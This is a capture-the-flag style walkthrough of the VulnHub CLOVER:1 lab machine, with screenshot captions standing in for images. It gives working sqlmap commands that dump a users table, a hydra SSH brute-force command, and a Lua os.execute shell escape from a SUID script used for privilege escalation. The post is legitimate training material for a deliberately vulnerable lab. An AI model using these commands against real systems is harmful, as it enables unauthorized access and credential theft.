Vulnhub CLOVER:1 writeup

Hi all, hope you all are safe. In this walkthrough, I will walk you through how to get root on the CLOVER:1 machine. It is created by 0xJin & 0xBushido. You can download it from this link.

Let’s start with nmap.

Nmap to find open ports:

finding open ports using nmap

Service version detection using nmap:

Service version detection using nmap

Downloaded all files from FTP on the local machine.

Nothing so interesting in files downloaded using FTP its rabbit hole!!

Nmap scan shows robots.txt, with below entries, another rabbit hole.

robots.txt

I decided to run gobuster and found few new entries.

gobuster result

Visited /website in a browser, it opens below page.

Also tried common username and password combination in phpMyAdmin login page, but unable to login.Then I viewed the source code for /website in the browser and it gave me the hint.

ColdFusion CMS

The CMS ColdFusion is used to build the website.I searched for ColdFusion Login URL and found that it starts with “CFIDE” directory. I visited it in the browser and it gave me blow result.

I opened Administrator directory. I tried gobuster with “.cfm” extension, but unable to fetch additional results. Then I decide to use extensions like “.php,.html,.zip,.bak” etc. it gave me the below result.

Visited /login.php and asked for the username and password. Tried different common username and passwords, but failed to login.

Failed login attempt

Then I used simple SQLi payload to login, and I have successfully logged into the application.

SQLI injection

But this does not give anything that I can use, so I decide to use SQLmap to exploit SQL injection further. I saved the login request in a file to use with sqlmap.

Used below command to retrieve current database.

sqlmap -r /tmp/clover_login_sqlmap — current-db — batch — risk=3 — level=5

current database is clover

To retrieve the table name in the clover database, used below command.

sqlmap -r /tmp/clover_login_sqlmap -D clover — tables — batch — risk=3 — level=5

user table in clover database

Fetching column names:

sqlmap -r /tmp/clover_login_sqlmap -D clover -T users — columns — batch — risk=3 — level=5

columns in table users

Final step to dump data in table users.Now I have usernames and MD5 hashed passwords.

usernames and hashed passwords

I tried to crack the hashes online and able to crack for user asta. Used cracked password to login as asta.

I used linPEAS.sh to automatically enumerate the box further, the section Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)” section it showed the passwd.sword file.

I decided to take a look at the file and it gives me partial password for user sword:

I need to create a password file with crunch to bruteforce the ssh for user sword.

Now I have a username and list of passwords, tried SSH brute-force using hydra to find the password for user sword.

hydra -l sword -P /tmp/clover/sword_pass ssh://192.168.9.94 -t 30 -V

Hydra successfully found the password for sword.

sword password

After login to sword using ssh, I usedfind command to see the suid binaries and found one.

suid binaries
deamon.sh suid

When I execute the deamon.sh it gives the prompt and its LUA, gtfobins helped me to get root using below command.

os.execute("/bin/sh")
root flag

Thanks for reading. Hope you like it.

References: